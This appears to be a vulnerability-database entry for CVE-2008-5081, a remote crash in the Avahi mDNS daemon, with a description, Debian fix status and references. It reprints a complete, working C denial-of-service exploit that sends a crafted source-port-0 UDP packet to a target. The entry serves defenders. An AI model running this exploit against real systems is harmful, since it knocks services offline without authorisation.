CVE-2008-5081

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

The originates_from_local_legacy_unicast_socket function (avahi-core/server.c) in avahi-daemon in Avahi before 0.6.24 allows remote attackers to cause a denial of service (crash) via a crafted mDNS packet with a source port of 0, which triggers an assertion failure.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-7520 dos multiple verified c · 2 KB

Jon Oberheide · 2008-12-19

Avahi < 0.6.24 - mDNS Daemon Remote Denial of Service

c exploit Source: Exploit-DB

/*
 * cve-2008-5081.c
 *
 * Avahi mDNS Daemon Remote DoS < 0.6.24
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Usage:
 *
 *   gcc cve-2008-5081.c -ldnet -o cve-2008-5081
 *   ./cve-2008-5081 1.2.3.4
 *  
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5081
 *    
 *   Crafted mDNS packet with source port 0 can cause avahi-daemon  
 *   to abort() due to failed assertion assert(port > 0); in  
 *   originates_from_local_legacy_unicast_socket() function in
 *   avahi-core/server.c.
 *
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dnet.h>
 
int
main(int argc, char **argv)
{
    ip_t *sock;
    intf_t *intf;
    struct addr dst;
    struct ip_hdr *ip;
    struct udp_hdr *udp;
    struct intf_entry entry;
    int len = IP_HDR_LEN + UDP_HDR_LEN;
    char buf[len];
 
    if (argc < 2 || addr_aton(argv[1], &dst)) {  
        printf("error: please specify a target ip address\n");
        return 1;
    }
 
    memset(buf, 0, sizeof(buf));
 
    ip = (struct ip_hdr *) buf;
    ip->ip_v = 4;
    ip->ip_hl = 5;
    ip->ip_tos = 0;
    ip->ip_off = 0;
    ip->ip_sum = 0;
    ip->ip_ttl = IP_TTL_MAX;
    ip->ip_p = IP_PROTO_UDP;
    ip->ip_id = htons(0xdead);
    ip->ip_len = htons(len);
 
    udp = (struct udp_hdr *) (buf + IP_HDR_LEN);
    
    udp->uh_sum = 0;
    udp->uh_sport = htons(0);
    udp->uh_dport = htons(5353);
    udp->uh_ulen = htons(UDP_HDR_LEN);
 
    intf = intf_open();
    intf_get_dst(intf, &entry, &dst);
    intf_close(intf);
 
    ip->ip_src = entry.intf_addr.addr_ip;
    ip->ip_dst = dst.addr_ip;
    ip_checksum(buf, len);
 
    sock = ip_open();
    if (!sock) {
        printf("error: root privileges needed for raw socket\n");
        return 1;
    }
    ip_send(sock, buf, len);
    ip_close(sock);
 
    return 0;
}

// milw0rm.com [2008-12-19]

Metasploit modules

auxiliary_dos/mdns/avahi_portzero rank 300

Avahi Source Port 0 DoS

Source fetch failed: fetch_error — view the original via the link above.

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`0.6.23-3`
sid	Fixed	`0.6.23-3`
forky	Fixed	`0.6.23-3`
bullseye	Fixed	`0.6.23-3`
bookworm	Fixed	`0.6.23-3`

References

https://security-tracker.debian.org/tracker/CVE-2008-5081

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.